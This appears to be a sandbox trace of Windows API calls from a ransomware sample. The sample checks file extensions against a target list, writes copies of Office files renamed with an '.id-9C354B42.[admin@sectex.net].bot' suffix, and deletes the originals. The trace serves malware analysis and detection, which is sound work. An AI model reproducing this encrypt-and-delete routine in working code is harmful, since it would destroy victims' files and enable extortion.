	[0168.985] WriteFile (in: hFile=0x398, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0168.985] SetEndOfFile (hFile=0x398) returned 1
	[0168.986] CloseHandle (hObject=0x398) returned 1
	[0168.986] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.986] SetEndOfFile (hFile=0x3b8) returned 1
	[0168.988] CloseHandle (hObject=0x3b8) returned 1
	[0168.988] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQS.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0168.988] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskreqs.ico")) returned 1
	[0168.988] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQS.ICO") returned 66
	[0168.988] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQS.ICO") returned 66
	[0168.989] lstrlenW (lpString=".doc") returned 4
	[0168.989] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0168.989] lstrlenW (lpString=".docx") returned 5
	[0168.989] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0168.989] lstrlenW (lpString=".pdf") returned 4
	[0168.989] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0168.989] lstrlenW (lpString=".xls") returned 4
	[0168.989] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0168.989] lstrlenW (lpString=".xlsx") returned 5
	[0168.989] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0168.989] lstrlenW (lpString=".ppt") returned 4
	[0168.989] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0168.989] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQS.ICO") returned 66
	[0168.989] lstrlenW (lpString=".zip") returned 4
	[0168.989] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0168.989] lstrlenW (lpString=".rar") returned 4
	[0168.989] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0168.989] lstrlenW (lpString=".bz2") returned 4
	[0168.989] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0168.989] lstrlenW (lpString=".7z") returned 3
	[0168.989] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0168.989] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQS.ICO") returned 66
	[0168.989] lstrlenW (lpString=".dbf") returned 4
	[0168.989] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0168.989] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQS.ICO") returned 66
	[0168.989] lstrlenW (lpString=".1cd") returned 4
	[0168.989] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0168.989] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQS.ICO") returned 66
	[0168.989] lstrlenW (lpString=".jpg") returned 4
	[0168.989] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0168.989] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQS.ICO") returned 66
	[0168.989] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQS.ICO") returned 66
	[0168.989] lstrlenW (lpString=".doc") returned 4
	[0168.989] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0168.990] lstrlenW (lpString=".docx") returned 5
	[0168.990] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0168.990] lstrlenW (lpString=".pdf") returned 4
	[0168.990] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0168.990] lstrlenW (lpString=".xls") returned 4
	[0168.990] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0168.990] lstrlenW (lpString=".xlsx") returned 5
	[0168.990] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0168.990] lstrlenW (lpString=".ppt") returned 4
	[0168.990] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0168.990] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQS.ICO") returned 66
	[0168.990] lstrlenW (lpString=".zip") returned 4
	[0168.990] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0168.990] lstrlenW (lpString=".rar") returned 4
	[0168.990] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0168.990] lstrlenW (lpString=".bz2") returned 4
	[0168.990] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0168.990] lstrlenW (lpString=".7z") returned 3
	[0168.990] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0168.990] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQS.ICO") returned 66
	[0168.990] lstrlenW (lpString=".dbf") returned 4
	[0168.990] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0168.990] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQS.ICO") returned 66
	[0168.990] lstrlenW (lpString=".1cd") returned 4
	[0168.990] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0168.990] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQS.ICO") returned 66
	[0168.990] lstrlenW (lpString=".jpg") returned 4
	[0168.990] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0168.990] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0168.990] lstrlenW (lpString="GRAPH.ICO") returned 9
	[0168.990] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\GRAPH.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\graph.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0169.032] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=766) returned 1
	[0169.032] CloseHandle (hObject=0x388) returned 1
	[0169.032] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\GRAPH.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\graph.ico")) returned 0x20
	[0169.032] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\GRAPH.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\graph.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.033] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\GRAPH.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\graph.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0169.033] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.033] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.033] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\GRAPH.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\graph.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0169.033] GetLastError () returned 0x0
	[0169.033] ReadFile (in: hFile=0x388, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x2fe, lpOverlapped=0x0) returned 1
	[0169.088] WriteFile (in: hFile=0x3c4, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x300, lpOverlapped=0x0) returned 1
	[0169.088] ReadFile (in: hFile=0x388, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.089] WriteFile (in: hFile=0x3c4, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0169.089] SetEndOfFile (hFile=0x3c4) returned 1
	[0169.366] CloseHandle (hObject=0x3c4) returned 1
	[0169.624] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.624] SetEndOfFile (hFile=0x388) returned 1
	[0169.809] CloseHandle (hObject=0x388) returned 1
	[0169.809] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\GRAPH.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.872] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\GRAPH.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\graph.ico")) returned 1
	[0169.907] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GRAPH.ICO") returned 52
	[0169.907] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GRAPH.ICO") returned 52
	[0169.907] lstrlenW (lpString=".doc") returned 4
	[0169.907] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0169.907] lstrlenW (lpString=".docx") returned 5
	[0169.907] lstrcmpiW (lpString1=".docx", lpString2="H.ICO") returned -1
	[0169.907] lstrlenW (lpString=".pdf") returned 4
	[0169.908] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0169.908] lstrlenW (lpString=".xls") returned 4
	[0169.908] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0169.908] lstrlenW (lpString=".xlsx") returned 5
	[0169.908] lstrcmpiW (lpString1=".xlsx", lpString2="H.ICO") returned -1
	[0169.908] lstrlenW (lpString=".ppt") returned 4
	[0169.908] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0169.908] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GRAPH.ICO") returned 52
	[0169.908] lstrlenW (lpString=".zip") returned 4
	[0169.908] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0169.908] lstrlenW (lpString=".rar") returned 4
	[0169.908] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0169.908] lstrlenW (lpString=".bz2") returned 4
	[0169.908] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0169.908] lstrlenW (lpString=".7z") returned 3
	[0169.908] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0169.908] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GRAPH.ICO") returned 52
	[0169.908] lstrlenW (lpString=".dbf") returned 4
	[0169.908] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0169.908] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GRAPH.ICO") returned 52
	[0169.908] lstrlenW (lpString=".1cd") returned 4
	[0169.908] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0169.908] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GRAPH.ICO") returned 52
	[0169.908] lstrlenW (lpString=".jpg") returned 4
	[0169.908] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0169.908] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GRAPH.ICO") returned 52
	[0169.908] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GRAPH.ICO") returned 52
	[0169.908] lstrlenW (lpString=".doc") returned 4
	[0169.908] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0169.908] lstrlenW (lpString=".docx") returned 5
	[0169.908] lstrcmpiW (lpString1=".docx", lpString2="H.ICO") returned -1
	[0169.908] lstrlenW (lpString=".pdf") returned 4
	[0169.908] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0169.908] lstrlenW (lpString=".xls") returned 4
	[0169.909] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0169.909] lstrlenW (lpString=".xlsx") returned 5
	[0169.909] lstrcmpiW (lpString1=".xlsx", lpString2="H.ICO") returned -1
	[0169.909] lstrlenW (lpString=".ppt") returned 4
	[0169.909] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0169.909] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GRAPH.ICO") returned 52
	[0169.909] lstrlenW (lpString=".zip") returned 4
	[0169.909] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0169.909] lstrlenW (lpString=".rar") returned 4
	[0169.909] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0169.909] lstrlenW (lpString=".bz2") returned 4
	[0169.909] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0169.909] lstrlenW (lpString=".7z") returned 3
	[0169.909] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0169.909] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GRAPH.ICO") returned 52
	[0169.909] lstrlenW (lpString=".dbf") returned 4
	[0169.909] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0169.909] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GRAPH.ICO") returned 52
	[0169.909] lstrlenW (lpString=".1cd") returned 4
	[0169.909] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0169.909] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GRAPH.ICO") returned 52
	[0169.909] lstrlenW (lpString=".jpg") returned 4
	[0169.909] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0169.909] lstrcmpiW (lpString1=".fdt", lpString2=".bot") returned 1
	[0169.909] lstrlenW (lpString="Hiring Requisition.fdt") returned 22
	[0169.909] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hiring Requisition.fdt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\hiring requisition.fdt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0169.924] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=149723) returned 1
	[0169.924] CloseHandle (hObject=0x3a4) returned 1
	[0169.924] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hiring Requisition.fdt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\hiring requisition.fdt")) returned 0x20
	[0169.966] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hiring Requisition.fdt.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\hiring requisition.fdt.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.978] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hiring Requisition.fdt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\hiring requisition.fdt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0169.979] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.979] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.979] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hiring Requisition.fdt.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\hiring requisition.fdt.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0169.980] GetLastError () returned 0x0
	[0169.980] ReadFile (in: hFile=0x3f0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x248db, lpOverlapped=0x0) returned 1
	[0170.011] WriteFile (in: hFile=0x1d8, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x248e0, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x248e0, lpOverlapped=0x0) returned 1
	[0170.014] ReadFile (in: hFile=0x3f0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0170.014] WriteFile (in: hFile=0x1d8, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x100, lpOverlapped=0x0) returned 1
	[0170.014] SetEndOfFile (hFile=0x1d8) returned 1
	[0170.014] CloseHandle (hObject=0x1d8) returned 1
	[0170.014] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.014] SetEndOfFile (hFile=0x3f0) returned 1
	[0170.019] CloseHandle (hObject=0x3f0) returned 1
	[0170.019] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hiring Requisition.fdt.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0170.019] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hiring Requisition.fdt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\hiring requisition.fdt")) returned 1
	[0170.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hiring Requisition.fdt") returned 119
	[0170.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hiring Requisition.fdt") returned 119
	[0170.020] lstrlenW (lpString=".doc") returned 4
	[0170.020] lstrcmpiW (lpString1=".doc", lpString2=".fdt") returned -1
	[0170.020] lstrlenW (lpString=".docx") returned 5
	[0170.020] lstrcmpiW (lpString1=".docx", lpString2="n.fdt") returned -1
	[0170.020] lstrlenW (lpString=".pdf") returned 4
	[0170.020] lstrcmpiW (lpString1=".pdf", lpString2=".fdt") returned 1
	[0170.020] lstrlenW (lpString=".xls") returned 4
	[0170.020] lstrcmpiW (lpString1=".xls", lpString2=".fdt") returned 1
	[0170.020] lstrlenW (lpString=".xlsx") returned 5
	[0170.020] lstrcmpiW (lpString1=".xlsx", lpString2="n.fdt") returned -1
	[0170.020] lstrlenW (lpString=".ppt") returned 4
	[0170.020] lstrcmpiW (lpString1=".ppt", lpString2=".fdt") returned 1
	[0170.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hiring Requisition.fdt") returned 119
	[0170.020] lstrlenW (lpString=".zip") returned 4
	[0170.020] lstrcmpiW (lpString1=".zip", lpString2=".fdt") returned 1
	[0170.020] lstrlenW (lpString=".rar") returned 4
	[0170.020] lstrcmpiW (lpString1=".rar", lpString2=".fdt") returned 1
	[0170.020] lstrlenW (lpString=".bz2") returned 4
	[0170.020] lstrcmpiW (lpString1=".bz2", lpString2=".fdt") returned -1
	[0170.020] lstrlenW (lpString=".7z") returned 3
	[0170.020] lstrcmpiW (lpString1=".7z", lpString2="fdt") returned -1
	[0170.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hiring Requisition.fdt") returned 119
	[0170.020] lstrlenW (lpString=".dbf") returned 4
	[0170.020] lstrcmpiW (lpString1=".dbf", lpString2=".fdt") returned -1
	[0170.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hiring Requisition.fdt") returned 119
	[0170.020] lstrlenW (lpString=".1cd") returned 4
	[0170.020] lstrcmpiW (lpString1=".1cd", lpString2=".fdt") returned -1
	[0170.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hiring Requisition.fdt") returned 119
	[0170.021] lstrlenW (lpString=".jpg") returned 4
	[0170.021] lstrcmpiW (lpString1=".jpg", lpString2=".fdt") returned 1
	[0170.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hiring Requisition.fdt") returned 119
	[0170.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hiring Requisition.fdt") returned 119
	[0170.021] lstrlenW (lpString=".doc") returned 4
	[0170.021] lstrcmpiW (lpString1=".doc", lpString2=".fdt") returned -1
	[0170.021] lstrlenW (lpString=".docx") returned 5
	[0170.021] lstrcmpiW (lpString1=".docx", lpString2="n.fdt") returned -1
	[0170.021] lstrlenW (lpString=".pdf") returned 4
	[0170.021] lstrcmpiW (lpString1=".pdf", lpString2=".fdt") returned 1
	[0170.021] lstrlenW (lpString=".xls") returned 4
	[0170.021] lstrcmpiW (lpString1=".xls", lpString2=".fdt") returned 1
	[0170.021] lstrlenW (lpString=".xlsx") returned 5
	[0170.021] lstrcmpiW (lpString1=".xlsx", lpString2="n.fdt") returned -1
	[0170.021] lstrlenW (lpString=".ppt") returned 4
	[0170.021] lstrcmpiW (lpString1=".ppt", lpString2=".fdt") returned 1
	[0170.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hiring Requisition.fdt") returned 119
	[0170.021] lstrlenW (lpString=".zip") returned 4
	[0170.021] lstrcmpiW (lpString1=".zip", lpString2=".fdt") returned 1
	[0170.021] lstrlenW (lpString=".rar") returned 4
	[0170.021] lstrcmpiW (lpString1=".rar", lpString2=".fdt") returned 1
	[0170.021] lstrlenW (lpString=".bz2") returned 4
	[0170.021] lstrcmpiW (lpString1=".bz2", lpString2=".fdt") returned -1
	[0170.021] lstrlenW (lpString=".7z") returned 3
	[0170.021] lstrcmpiW (lpString1=".7z", lpString2="fdt") returned -1
	[0170.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hiring Requisition.fdt") returned 119
	[0170.021] lstrlenW (lpString=".dbf") returned 4
	[0170.021] lstrcmpiW (lpString1=".dbf", lpString2=".fdt") returned -1
	[0170.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hiring Requisition.fdt") returned 119
	[0170.021] lstrlenW (lpString=".1cd") returned 4
	[0170.021] lstrcmpiW (lpString1=".1cd", lpString2=".fdt") returned -1
	[0170.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Hiring Requisition.fdt") returned 119
	[0170.022] lstrlenW (lpString=".jpg") returned 4
	[0170.022] lstrcmpiW (lpString1=".jpg", lpString2=".fdt") returned 1
	[0170.022] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0170.022] lstrlenW (lpString="FORM.ICO") returned 8
	[0170.022] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FORM.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\form.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0170.022] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=318) returned 1
	[0170.022] CloseHandle (hObject=0x3f0) returned 1
	[0170.023] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FORM.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\form.ico")) returned 0x20
	[0170.023] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FORM.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\form.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0170.023] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FORM.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\form.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0170.023] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.023] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.023] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FORM.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\form.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180
	[0170.698] GetLastError () returned 0x0
